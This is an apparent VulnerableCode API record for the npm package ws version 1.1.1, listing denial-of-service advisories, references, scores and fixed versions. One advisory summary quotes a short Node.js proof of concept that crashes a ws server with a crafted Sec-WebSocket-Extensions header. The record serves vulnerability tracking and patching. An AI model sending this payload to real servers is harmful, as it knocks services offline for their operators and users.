Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/51723?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/51723?format=api", "purl": "pkg:npm/ws@1.1.1", "type": "npm", "namespace": "", "name": "ws", "version": "1.1.1", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "1.1.5", "latest_non_vulnerable_version": "8.20.1", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/11892?format=api", "vulnerability_id": "VCID-4851-mkc2-pqdw", "summary": "Denial of Service\nA specially crafted value of the `Sec-WebSocket-Extensions` header that uses `Object.prototype` property names as extension or parameter names can be used to make a `ws` server crash.", "references": [ { "reference_url": "https://github.com/websockets/ws/commit/c4fe46608acd61fbf7397eadc47378903f95b78a", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/websockets/ws/commit/c4fe46608acd61fbf7397eadc47378903f95b78a" }, { "reference_url": "https://github.com/websockets/ws/releases/tag/3.3.1", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/websockets/ws/releases/tag/3.3.1" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/53597?format=api", "purl": "pkg:npm/ws@3.3.1", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/ws@3.3.1" } ], "aliases": [ "GMS-2017-331" ], "risk_score": null, "exploitability": "0.5", "weighted_severity": "0.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4851-mkc2-pqdw" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/13656?format=api", "vulnerability_id": "VCID-4u5m-kp7t-x3cf", "summary": "Denial of Service in ws\nAffected versions of `ws` can crash when a specially crafted `Sec-WebSocket-Extensions` header containing `Object.prototype` property names as extension or parameter names is sent.\n\n## Proof of concept\n\n```\nconst WebSocket = require('ws');\nconst net = require('net');\n\nconst wss = new WebSocket.Server({ port: 3000 }, function () {\n const payload = 'constructor'; // or ',;constructor'\n\n const request = [\n 'GET / HTTP/1.1',\n 'Connection: Upgrade',\n 'Sec-WebSocket-Key: test',\n 'Sec-WebSocket-Version: 8',\n `Sec-WebSocket-Extensions: ${payload}`,\n 'Upgrade: websocket',\n '\\r'\n ].join('\\r');\n\n const socket = net.connect(3000, function () {\n socket.resume();\n socket.write(request);\n });\n});\n```\n\n\n## Recommendation\n\nUpdate to version 3.3.1 or later.", "references": [ { "reference_url": "https://github.com/websockets/ws/commit/c4fe46608acd61fbf7397eadc47378903f95b78a", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/websockets/ws/commit/c4fe46608acd61fbf7397eadc47378903f95b78a" }, { "reference_url": "https://github.com/websockets/ws/commit/f8fdcd40ac8be7318a6ee41f5ceb7e77c995b407", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/websockets/ws/commit/f8fdcd40ac8be7318a6ee41f5ceb7e77c995b407" }, { "reference_url": "https://nodesecurity.io/advisories/550", "reference_id": "", "reference_type": "", "scores": [], "url": "https://nodesecurity.io/advisories/550" }, { "reference_url": "https://snyk.io/vuln/npm:ws:20171108", "reference_id": "", "reference_type": "", "scores": [], "url": "https://snyk.io/vuln/npm:ws:20171108" }, { "reference_url": "https://www.npmjs.com/advisories/550", "reference_id": "", "reference_type": "", "scores": [], "url": "https://www.npmjs.com/advisories/550" }, { "reference_url": "https://www.npmjs.com/advisories/550/versions", "reference_id": "", "reference_type": "", "scores": [], "url": "https://www.npmjs.com/advisories/550/versions" }, { "reference_url": "https://github.com/advisories/GHSA-5v72-xg48-5rpm", "reference_id": "GHSA-5v72-xg48-5rpm", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-5v72-xg48-5rpm" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/57135?format=api", "purl": "pkg:npm/ws@1.1.5", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/ws@1.1.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/53597?format=api", "purl": "pkg:npm/ws@3.3.1", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/ws@3.3.1" } ], "aliases": [ "GHSA-5v72-xg48-5rpm", "GMS-2019-145" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4u5m-kp7t-x3cf" } ], "fixing_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/13362?format=api", "vulnerability_id": "VCID-37mw-j411-a3az", "summary": "Improper Input Validation\nws is a \"simple to use, blazing fast and thoroughly tested websocket client, server and console for node.js, up-to-date against RFC-6455\". By sending an overly long websocket payload to a `ws` server, it is possible to crash the node process. This affects ws 1.1.0 and earlier.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2016-10542", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.66075", "scoring_system": "epss", "scoring_elements": "0.98537", "published_at": "2026-05-30T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2016-10542" }, { "reference_url": "https://github.com/nodejs/node/issues/7388", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/nodejs/node/issues/7388" }, { "reference_url": "https://nodesecurity.io/advisories/120", "reference_id": "", "reference_type": "", "scores": [], "url": "https://nodesecurity.io/advisories/120" }, { "reference_url": "https://www.npmjs.com/advisories/120", "reference_id": "", "reference_type": "", "scores": [], "url": "https://www.npmjs.com/advisories/120" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2016-10542", "reference_id": "CVE-2016-10542", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-10542" }, { "reference_url": "https://github.com/advisories/GHSA-6663-c963-2gqg", "reference_id": "GHSA-6663-c963-2gqg", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-6663-c963-2gqg" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/51723?format=api", "purl": "pkg:npm/ws@1.1.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4851-mkc2-pqdw" }, { "vulnerability": "VCID-4u5m-kp7t-x3cf" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/ws@1.1.1" } ], "aliases": [ "CVE-2016-10542", "GHSA-6663-c963-2gqg" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-37mw-j411-a3az" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/10958?format=api", "vulnerability_id": "VCID-hedn-18sd-bba2", "summary": "DoS due to excessively large websocket message\nIt is possible to crash the node process by sending an overly long websocket payload to a ws server.", "references": [ { "reference_url": "https://github.com/nodejs/node/issues/7388", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/nodejs/node/issues/7388" }, { "reference_url": "https://github.com/websockets/ws/commit/0328a8f49f004f98d2913016214e93b2fc2713bc", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/websockets/ws/commit/0328a8f49f004f98d2913016214e93b2fc2713bc" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/51723?format=api", "purl": "pkg:npm/ws@1.1.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4851-mkc2-pqdw" }, { "vulnerability": "VCID-4u5m-kp7t-x3cf" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/ws@1.1.1" } ], "aliases": [ "GMS-2016-38" ], "risk_score": null, "exploitability": "0.5", "weighted_severity": "0.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-hedn-18sd-bba2" } ], "risk_score": "4.0", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/ws@1.1.1" }